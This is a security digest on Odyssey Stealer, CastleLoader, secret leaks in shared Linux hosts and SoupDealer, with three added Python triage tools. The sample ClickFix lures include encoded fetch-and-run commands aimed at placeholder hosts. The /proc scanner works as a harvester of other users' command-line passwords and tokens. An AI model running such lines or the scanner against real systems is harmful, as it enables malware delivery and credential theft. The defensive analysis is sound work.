Odyssey Stealer Targets macOS in Sophisticated ClickFix Campaign
In August 2025, researchers at X-Labs uncovered Odyssey Stealer. This macOS-targeting malware builds on earlier ClickFix phishing techniques to harvest cryptocurrency wallet data, browser credentials, and sensitive personal files. The campaign relies on domains that display fake CAPTCHA verification pages which fingerprint the visitor's operating system. On macOS, the page instructs the user to open Terminal, paste a command carrying a Base64-encoded payload, and execute it. The step is framed as verification, but the command decodes the payload, then downloads and runs a heavily obfuscated AppleScript from a remote server. Because delivery depends on user-initiated execution rather than an emailed or downloaded file, the lure sidesteps email gateways and file-based antivirus detection. The AppleScript then prompts for the user's password under the guise of authentication, giving the malware the credential it needs for elevated access to protected areas of the system. Once active, Odyssey Stealer searches browsers and local directories for cryptocurrency wallet applications and browser wallet extensions, including Electrum, Exodus, Litecoin, and Wasabi, as well as stored credentials, cookies, autofill data, and documents with high-value file extensions. It also targets Safari cookies, Apple Notes, and macOS Keychain entries to maximize the theft of credentials and secrets. The collected data is compressed into a ZIP archive and uploaded to the attacker-controlled C2 server, which hosts a dedicated control panel for managing the stolen information. The malware layers obfuscation and random string generation to evade static detection, and it deletes its temporary files and directories after exfiltration, leaving minimal forensic traces. By combining OS detection, user-driven execution, and comprehensive data theft, Odyssey Stealer underscores the spread of ClickFix tactics beyond Windows into the macOS ecosystem, with a strong focus on cryptocurrency and financially motivated intrusions.
To mitigate ClickFix-style phishing, harden browsers and the OS, block known malicious domains, and train users never to paste unsolicited commands into Terminal, however the page frames the request.
CastleLoader Malware Expands ClickFix Campaigns Against Windows Targets
Since early 2025, the CastleLoader malware has compromised over 400 Windows devices through a blend of phishing, social engineering, and abuse of trusted platforms. Researchers at PRODAFT documented 469 confirmed infections by May 2025, noting that the loader has been used against multiple sectors, with U.S. government entities among the most prominent victims. The infection chain typically begins with Cloudflare-themed ClickFix lures, fake browser update alerts, or malicious domains that mimic services such as Google Meet. Victims are tricked into running attacker-supplied PowerShell commands via the Windows Run dialog, which bypasses email security controls because delivery depends entirely on user action. In parallel, CastleLoader operators poison open-source software supply chains through counterfeit GitHub repositories, including fake SQL Server Management Studio libraries, to reach developer environments. Once installed, CastleLoader uses a combination of PowerShell scripts and AutoIt-compiled executables to achieve persistence, evade detection, and load tailored follow-on payloads from seven hardened command-and-control servers. These payloads include StealC, RedLine, DeerStealer, and several remote access tools such as NetSupport RAT and SectopRAT, which enable credential theft, data exfiltration, and long-term access. The loader's control panel gives attackers granular victim telemetry, geographic targeting, anti-virtual-machine checks, and the ability to chain in other loaders. Communication with C2 infrastructure is routed through compromised sites and legitimate file-sharing platforms to increase resilience and reduce takedown risk. This modular approach, combined with convincing phishing lures, positions CastleLoader as a durable, multi-purpose threat capable of serving as the first step in ransomware, espionage, or large-scale credential theft campaigns.
To mitigate, enforce application allowlisting, monitor for abnormal PowerShell execution (in particular encoded or hidden-window commands launched from the Run dialog), and vet software sources, especially GitHub repositories, to block CastleLoader's phishing and supply chain delivery vectors.
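Both the Odyssey Stealer and CastleLoader stories above turn on the same ClickFix mechanic: the victim pastes a command whose real payload is hidden behind Base64, either a bash one-liner that pipes through base64 -d on macOS or a PowerShell -EncodedCommand (UTF-16LE Base64) on Windows. The following is an added example written for this digest, not code from either research team: a small triage helper that peels those Base64 layers and flags the downloader and interpreter names an analyst looks for. The indicator list, the platform heuristic, and the two sample lures are assumptions constructed here; the sample URLs use the reserved .invalid domain and do not point at any real infrastructure.

```python
import base64
import re

# Strings worth flagging in a decoded ClickFix command. This list is an
# assumption for the example, not an indicator set taken from either report.
INDICATORS = [
    "osascript", "curl", "wget", "bash", "base64",
    "powershell", "mshta", "iwr", "iex", "Invoke-WebRequest",
    "Invoke-Expression", "DownloadString",
]

# PowerShell accepts abbreviated switch names, so "-e", "-ec", "-enc" and
# "-EncodedCommand" all introduce a UTF-16LE Base64 script.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Any long Base64-looking run, as in `echo <blob> | base64 -d | bash` lures.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _try_b64(blob, encoding):
    """Decode blob as Base64 text in the given encoding; None if it is not text."""
    try:
        text = base64.b64decode(blob, validate=True).decode(encoding)
    except (ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def decode_layers(cmd, depth=0):
    """Peel nested Base64 layers (bash and PowerShell styles) out of a command."""
    layers = []
    if depth > 3:  # stop runaway recursion on hostile input
        return layers
    enc = ENC_RE.search(cmd)
    if enc:
        text = _try_b64(enc.group(1), "utf-16-le")
        if text:
            layers.append(text)
            layers += decode_layers(text, depth + 1)
    for blob in B64_RE.findall(cmd):
        if enc and blob == enc.group(1):
            continue  # already handled as -EncodedCommand
        text = _try_b64(blob, "utf-8")
        if text:
            layers.append(text)
            layers += decode_layers(text, depth + 1)
    return layers


def triage(cmd):
    """Return a platform guess, the decoded layers and the indicators matched."""
    layers = decode_layers(cmd)
    # Blank out raw Base64 runs so indicator matching only sees decoded text.
    text = B64_RE.sub(" ", "\n".join([cmd] + layers))
    hits = sorted(
        i for i in INDICATORS
        if re.search(r"(?<![\w-])" + re.escape(i) + r"(?!\w)", text, re.I)
    )
    low = text.lower()
    if re.search(r"\b(powershell|mshta|iwr|iex|cmd\.exe)\b", low):
        platform = "windows"
    elif "osascript" in low or "/bin/bash" in low or "base64 -d" in low:
        platform = "macos/unix"
    else:
        platform = "unknown"
    return {"platform": platform, "layers": layers, "indicators": hits}


# Constructed sample lures (not artefacts from either campaign). The payloads are
# Base64-encoded here at runtime so the blobs are guaranteed well-formed.
_MAC_STAGE = b"curl -fsSL http://example.invalid/a.scpt | osascript"
MAC_LURE = "echo '%s' | base64 -d | bash" % base64.b64encode(_MAC_STAGE).decode()
_WIN_STAGE = "iwr http://example.invalid/x.ps1 | iex".encode("utf-16-le")
WIN_LURE = "powershell -w hidden -ep bypass -enc " + base64.b64encode(_WIN_STAGE).decode()

if __name__ == "__main__":
    for lure in (MAC_LURE, WIN_LURE):
        print(triage(lure))
```

Run it with no arguments to see both constructed lures unwrapped; to triage a real paste, call triage() on the string a user reports or that endpoint telemetry captured from Terminal or the Run dialog. The recursion depth cap matters because attackers nest encodings to defeat exactly this kind of one-shot decode.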
Shared Linux Utilities Abused to Steal Secrets Without Exploits
At Black Hat USA 2025, security researcher Ionuț Cernica demonstrated how standard Linux tools and default configurations in multi-tenant environments can be abused to harvest sensitive data without root access and without exploiting any software vulnerability. His research, titled "Silent Leaks: Harvesting Secrets from Shared Linux Environments," showed that process visibility, temporary file handling, and shared logging can expose database credentials, API keys, session cookies, and other secrets to any local user. Using commands such as ps and pgrep, or direct reads of /proc/[pid]/cmdline, an attacker can watch running processes in real time and capture plaintext credentials passed as command-line arguments. In real-world hosting scenarios this revealed WordPress database usernames and passwords, as well as MySQL root credentials, without generating any alerts. Cernica also demonstrated escapes from standard isolation measures, including CageFS and chroot jails, by leveraging privileged hosting-panel binaries and undocumented file manager commands to execute host-level actions. Shared error logs were another attack surface: LiteSpeed's global stderr.log could be read through /proc/self/fd/2, the inherited standard-error descriptor, allowing the capture of live error messages from other tenants, which often contained bearer tokens or login data. Even without process visibility, temporary directories such as /tmp provided fertile ground for credential theft, because applications briefly wrote SQL dumps, installation logs, and PHP scripts containing hardcoded admin passwords there. His proof-of-concept monitoring script detected and exfiltrated these files within milliseconds of their creation.
To mitigate the risk, Cernica recommends hiding other users' process entries by mounting /proc with hidepid, keeping credentials in vaults rather than passing them as command-line arguments, giving each user private logs and temporary directories, and running targeted red-team exercises to find these "silent leaks." The findings show that in shared Linux setups, whether web hosting, educational labs, or containerized platforms, the most significant gaps often come not from zero-day vulnerabilities but from overlooked, trusted system functions.
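The /proc/[pid]/cmdline leak and the hidepid mitigation described above are easy to demonstrate on any Linux box. The following is an added example written for this digest, not Cernica's proof-of-concept: it reads every readable cmdline the way an unprivileged tenant would, pulls out values that look like passwords or tokens passed in argv, and reports whether /proc is mounted with hidepid. The argument patterns it recognises and the sample cmdline records are assumptions constructed here (the samples mimic the NUL-separated /proc layout and were not captured from a real host).

```python
import os
import re

# Argument shapes that carry a secret in argv. The list is an assumption for
# this example; real harvesters cast a much wider net.
MYSQL_CLIENTS = {"mysql", "mysqldump", "mysqladmin", "mysqlimport"}  # accept -pSECRET
VALUE_NEXT = {"--password", "--token", "--api-key", "--secret"}        # value in next argv
INLINE_RE = re.compile(
    r"^(?:--password|--token|--api-key|--secret|[A-Z_]*(?:PASSWORD|SECRET|TOKEN|KEY))=(?P<secret>.+)$",
    re.I,
)
BEARER_RE = re.compile(r"^(?:Authorization:\s*)?Bearer\s+(?P<secret>\S+)$", re.I)


def parse_cmdline(raw):
    """Split the NUL-separated /proc/<pid>/cmdline into argv (trailing empty field dropped)."""
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def find_secrets(argv):
    """Return secret-looking values passed on the command line, in argv order."""
    found = []
    prog = os.path.basename(argv[0]) if argv else ""
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in VALUE_NEXT and i + 1 < len(argv):
            found.append(argv[i + 1])
            i += 2
            continue
        m = INLINE_RE.match(arg) or BEARER_RE.match(arg)
        if m:
            found.append(m.group("secret"))
        elif prog in MYSQL_CLIENTS and arg.startswith("-p") and len(arg) > 2:
            found.append(arg[2:])  # mysql -pS3cr3t glues the password to the flag
        i += 1
    return found


def proc_hidepid(mounts_text):
    """Return the hidepid value of the last /proc mount listed in /proc/mounts, or None."""
    value = None
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[1] == "/proc" and parts[2] == "proc":
            value = None
            for opt in parts[3].split(","):
                if opt.startswith("hidepid="):
                    value = opt.split("=", 1)[1]
    return value


def scan_proc(proc="/proc"):
    """Read every readable /proc/<pid>/cmdline and report secret-looking argv values."""
    hits = {}
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc, pid, "cmdline"), "rb") as f:
                argv = parse_cmdline(f.read())
        except OSError:
            continue  # process exited, or hidepid keeps other users' entries out of view
        secrets = find_secrets(argv)
        if secrets:
            hits[int(pid)] = (argv[0], secrets)
    return hits


# Constructed cmdline records in /proc's NUL-separated layout (not real captures).
SAMPLE_CMDLINES = [
    b"mysql\0-uwpuser\0-pWpDbP4ss!\0wordpress\0",
    b"mysqldump\0--user=root\0--password=RootP4ss\0--all-databases\0",
    b"curl\0-H\0Authorization: Bearer eyJhbGciOi.example\0https://api.example.invalid/v1\0",
    b"php-fpm: pool www\0",
]

if __name__ == "__main__":
    with open("/proc/mounts") as f:
        print("hidepid:", proc_hidepid(f.read()))
    for pid, (prog, secrets) in sorted(scan_proc().items()):
        print(pid, prog, secrets)
```

Run it as an ordinary user on a shared host: with the default mount it lists other tenants' database passwords as soon as a mysql or mysqldump invocation is running, and with /proc remounted as `mount -o remount,hidepid=2 /proc` (newer kernels also accept hidepid=invisible) the same scan sees only the caller's own processes. The hidepid check is split out so a configuration audit can run it without harvesting anything.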
SoupDealer Malware Evades Detection and Targets Turkey in Multi-Stage Attacks
The SoupDealer malware has emerged as a highly evasive threat that bypassed nearly all public sandboxes, antivirus tools, and even enterprise-grade EDR/XDR platforms during testing, with only Threat.Zone detecting it. Actively deployed in real-world attacks, the malware has hit banks, ISPs, and mid-sized organizations and has caused significant operational damage. Researchers traced recent campaigns to targeted phishing emails aimed at Windows systems configured for the Turkish language. These messages deliver malicious JAR files, including "TEKLIFALINACAKURUNLER.jar" and "FIYATTEKLIFI.JAR", that start a three-stage loader chain. Once executed, the malware checks the victim's location and language settings and proceeds only if the system is in Turkey, ensuring geo-specific targeting. Attackers gain full remote control of infected devices through command-and-control (C2) servers reached over the Tor network, and under C2 direction the malware can spread further by sending phishing messages from the victim's own email account. Analysis reveals a layered loader architecture that begins with an obfuscated Java class loader designed to resist decompilation and static analysis. The first stage decrypts the second-stage payload with AES-ECB using a SHA-512-derived key; RC4 decryption then unpacks the third-stage core malware. This final stage performs extensive environmental checks (system specifications, Windows Server detection, Turkish geolocation) before establishing persistence through scheduled tasks and downloading Tor to route C2 traffic through onion domains. The malware supports at least 11 direct C2 commands, enabling file management, remote command execution, screenshot capture, DDoS attacks, worm-style network propagation, and disabling Windows Defender through PowerShell. It also includes self-uninstall routines, payload download capabilities, and anti-forensics measures.
SoupDealer's success highlights the limits of cloud-based sandboxing against geo- and language-gated samples and reinforces the need for analysis environments configured with localized settings. To mitigate, deploy on-premises sandboxes with regional network egress and matching locale settings, strengthen phishing defenses, and monitor for unexpected Tor activity and unauthorized scheduled tasks to detect and contain SoupDealer infections.
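The scheduled-task persistence and Tor download described above give a responder something concrete to hunt for. The following is an added example written for this digest, not code from the SoupDealer research: it parses an exported Task Scheduler definition in the XML format Windows itself produces and flags actions that launch Java with -jar, start a binary named tor, or run anything from a user-writable location. The heuristics and the two sample task definitions are assumptions constructed here; they do not reproduce SoupDealer's actual task name, paths or file names, which the report does not give.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler's XML export (Export-ScheduledTask, schtasks /query /xml).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Heuristics are assumptions for this example: a binary launched from a
# user-writable location, Java started with -jar, or a Tor client binary.
USER_WRITABLE = re.compile(
    r"%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE|PUBLIC)%"
    r"|\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\"
    r"|\\ProgramData\\",
    re.I,
)
SUSPECT_BINARY = re.compile(r"^(?:java|javaw|tor)(?:\.exe)?$", re.I)


def triage_task_xml(xml_text):
    """Parse one exported task definition and flag Exec actions matching the heuristics."""
    root = ET.fromstring(xml_text)
    author = root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS)
    user = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    findings = []
    for exec_action in root.findall("t:Actions/t:Exec", NS):
        command = exec_action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        arguments = exec_action.findtext("t:Arguments", default="", namespaces=NS).strip()
        reasons = []
        if USER_WRITABLE.search(command):
            reasons.append("command in user-writable path")
        if USER_WRITABLE.search(arguments):
            reasons.append("argument in user-writable path")
        binary = command.replace("/", "\\").split("\\")[-1]
        if SUSPECT_BINARY.match(binary):
            reasons.append("suspect binary " + binary.lower())
        if re.search(r"(?:^|\s)-jar\b", arguments, re.I):
            reasons.append("java -jar launch")
        if reasons:
            findings.append({"command": command, "arguments": arguments, "reasons": reasons})
    return {"author": author, "user": user, "findings": findings}


def load_task_file(path):
    """Read an exported task file, tolerating UTF-16 (BOM) or UTF-8, and drop the XML declaration."""
    with open(path, "rb") as f:
        data = f.read()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = data.decode("utf-16")
    else:
        text = data.decode("utf-8-sig")
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", text)


# Constructed task definitions in the exported XML layout (not real artefacts).
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>PC\user</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>PC\user</UserId></Principal></Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\jre\bin\javaw.exe</Command>
      <Arguments>-jar C:\Users\user\AppData\Roaming\update.jar</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>%windir%\system32\sc.exe</Command><Arguments>start w32time task_started</Arguments></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    # Export on the host first, e.g. in PowerShell:
    #   Export-ScheduledTask -TaskName "Name" | Out-File task.xml -Encoding unicode
    # then: python triage_task.py task.xml [more.xml ...]
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            print(path, triage_task_xml(load_task_file(path)))
    else:
        print(triage_task_xml(SUSPICIOUS_TASK))
        print(triage_task_xml(BENIGN_TASK))
```

Export every task rather than only the ones that look odd in the GUI: a task that runs javaw.exe from %APPDATA% under the logged-on user's identity is exactly the shape a loader dropped by a phishing JAR would create, and the exporter records the author and principal that the Task Scheduler console hides in detail panes.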